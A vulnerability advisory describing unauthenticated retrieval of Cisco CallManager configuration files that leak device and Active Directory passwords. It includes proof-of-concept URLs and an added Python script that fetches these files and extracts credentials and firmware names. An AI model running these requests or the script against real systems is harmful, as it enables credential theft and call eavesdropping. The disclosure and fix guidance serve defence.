usd-2018-0036 | Cisco Unified Communications Manager (CallManager)/11.5.1.15900-18 (likely in all versions)

Advisory ID: usd-2018-0036
CVE Number: N/A
Affected Product: Unified Communications Manager
Affected Version: 11.5.1.15900-18 (likely in all versions)
Vulnerability Type: Exposure of Sensitive Configuration Data
Security Risk: Critical
Vendor URL: https://www.cisco.com
Vendor Status: Unknown

Description

Cisco Unified Communications Manager (CallManager) is the central server component of Cisco video conferencing and video telephony infrastructures. A typical setup consists of one or more CallManagers and a number of video conferencing endpoints, such as the Cisco TelePresence SX20. These devices, which are typically located in conference rooms, connect to the CallManagers to retrieve their configuration files and to set up video calls. usd discovered multiple vulnerabilities in the way these devices interact with the CallManager and within the CallManager itself.

First Proof of Concept

A request to the following URL retrieves the configuration file of a specific device, which contains clear-text credentials. The service on TCP port 6970 answers without any authentication, so the request can be issued from any host that can reach the CallManager. Replace SEPXXXXXXXXX with the device name (SEP followed by the device's MAC address):
http://10.10.10.10:6970/SEPXXXXXXXXX.cnf.xml

The resulting XML file contains the device's administrative password in clear text; the value observed was:

adminpassw0rd!

Using these credentials the attacker can authenticate to the target device via SSH or HTTPS. This allows the attacker to manipulate the device's configuration or to create and download captures of network traffic, which can be used to eavesdrop on video and audio calls.

Second Proof of Concept

A request to the following URL retrieves the default configuration file, which contains Active Directory (AD) user credentials. No device name is needed, so this file can be fetched without any prior knowledge of the deployment:
http://10.10.10.10:6970/SPDefault.cnf.xml

The resulting XML file contains a clear-text AD user name and password. In the example the two values read, run together, as:

AD-Domain\ucm_userucm_passw0rd!

These credentials give an attacker a valid domain user account.

Third Proof of Concept

A request to the following URL served up a firmware package:
http://10.10.10.10:6970/s52010ce9_4_1-6ae80e1f2ee.pkg

Note: The file name may differ on other CallManagers. The XML files mentioned above contain references to these file names, such as: s52020ce9_4_1-6ae80e1f2ee.pkg
With the firmware image in hand, an attacker can analyse the device software offline and search it for additional vulnerabilities.
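The three requests above can be scripted. The following Python is an added example written for this page, not code from usd AG or Cisco. The element names in the embedded sample file (sshUserId, sshPassword, directoryUser, directoryPassword, loadInformation) are assumptions, because the tag names do not survive in the advisory text; the sample file itself is constructed from the values the advisory shows. The script builds the port 6970 URL for a device or for the SPDefault file, fetches it without credentials (the service asks for none), and walks the XML for credential-bearing leaf elements and referenced firmware packages.

```python
import re
import sys
import urllib.request
import xml.etree.ElementTree as ET

# Constructed sample of a device configuration file as served by the
# CallManager's HTTP service on port 6970. The element names are an
# assumption made for this example; only the values come from the advisory.
SAMPLE_CNF_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<device>
  <devicePool>
    <name>Default</name>
  </devicePool>
  <sshUserId>admin</sshUserId>
  <sshPassword>adminpassw0rd!</sshPassword>
  <directoryUser>AD-Domain\\ucm_user</directoryUser>
  <directoryPassword>ucm_passw0rd!</directoryPassword>
  <loadInformation>s52020ce9_4_1-6ae80e1f2ee.pkg</loadInformation>
</device>
"""

# Substrings that mark an element as credential-bearing (assumption; tune per deployment).
CREDENTIAL_HINTS = ("pass", "pwd", "secret", "user", "login")

# Firmware package references look like s52020ce9_4_1-6ae80e1f2ee.pkg
PKG_RE = re.compile(r"[A-Za-z0-9_.-]+\.pkg")


def config_url(host, name, port=6970):
    """URL of a configuration file on the CallManager's TFTP-over-HTTP service.

    `name` is SEP<MAC> for a specific device or SPDefault for the shared defaults.
    """
    return f"http://{host}:{port}/{name}.cnf.xml"


def fetch(url, timeout=10):
    """Retrieve a file. No credentials are sent because the service requires none."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


def find_credentials(xml_bytes):
    """Return (path, value) for every non-empty leaf whose element name hints at a credential."""
    root = ET.fromstring(xml_bytes)
    hits = []

    def walk(elem, path):
        tag = elem.tag.rsplit("}", 1)[-1]  # strip any namespace prefix
        path = f"{path}/{tag}"
        if len(elem) == 0:
            text = (elem.text or "").strip()
            if text and any(h in tag.lower() for h in CREDENTIAL_HINTS):
                hits.append((path, text))
        for child in elem:
            walk(child, path)

    walk(root, "")
    return hits


def find_firmware_refs(xml_bytes):
    """Return the firmware package names referenced anywhere in the file."""
    return sorted(set(PKG_RE.findall(xml_bytes.decode("utf-8", "replace"))))


def report(xml_bytes):
    """Summarise one configuration file as a dict (works on live and sample data)."""
    return {
        "credentials": find_credentials(xml_bytes),
        "firmware": find_firmware_refs(xml_bytes),
    }


if __name__ == "__main__":
    # Usage: python cucm_cnf.py <callmanager-ip> <SEPxxxxxxxxxxxx|SPDefault>
    # Without arguments the constructed sample above is analysed instead.
    if len(sys.argv) == 3:
        data = fetch(config_url(sys.argv[1], sys.argv[2]))
    else:
        data = SAMPLE_CNF_XML
    summary = report(data)
    for path, value in summary["credentials"]:
        print(f"{path}: {value}")
    for pkg in summary["firmware"]:
        print(f"firmware: {pkg}")
```

The name-based heuristic is deliberately loose: a file from a different CallManager or firmware generation may use other element names, so it is easier to over-match and review the output than to hard-code tags. The firmware names it extracts are the ones to request from the same port 6970 service, as in the third proof of concept.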

Fix

To prevent unauthorized access to this data, the CallManager needs to authenticate the devices that request configuration files instead of serving them to any client. Additionally, the CallManager should serve these files over HTTPS so that the credentials are not transmitted in clear text.

Timeline

  • 2018-10-31 Advisory has been sent to psirt@cisco.com
  • 2018-11-09 Public disclosure deadline extended to 2019-01-23
  • 2019-01-23 Security advisory released

Credits

These security vulnerabilities were discovered by Marcus Gruber and Maximilian Boehner of usd AG.

ABOUT usd SECURITY ADVISORIES

In order to protect businesses against hackers and criminals, we always have to keep our skills and knowledge up to date. Thus, security research is just as important for our work as is building up a security community to promote the exchange of knowledge. After all, more security can only be achieved if many individuals take on the task.

Our CST Academy and our usd HeroLab are essential parts of our security mission. We share the knowledge we gain in our practical work and our research through training courses and publications. In this context, the usd HeroLab publishes a series of papers on new vulnerabilities and current security issues.

Always for the sake of our mission: "more security."



In accordance with usd AG’s Responsible Disclosure Policy, all vendors have been notified of the existence of these vulnerabilities.

Disclaimer

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.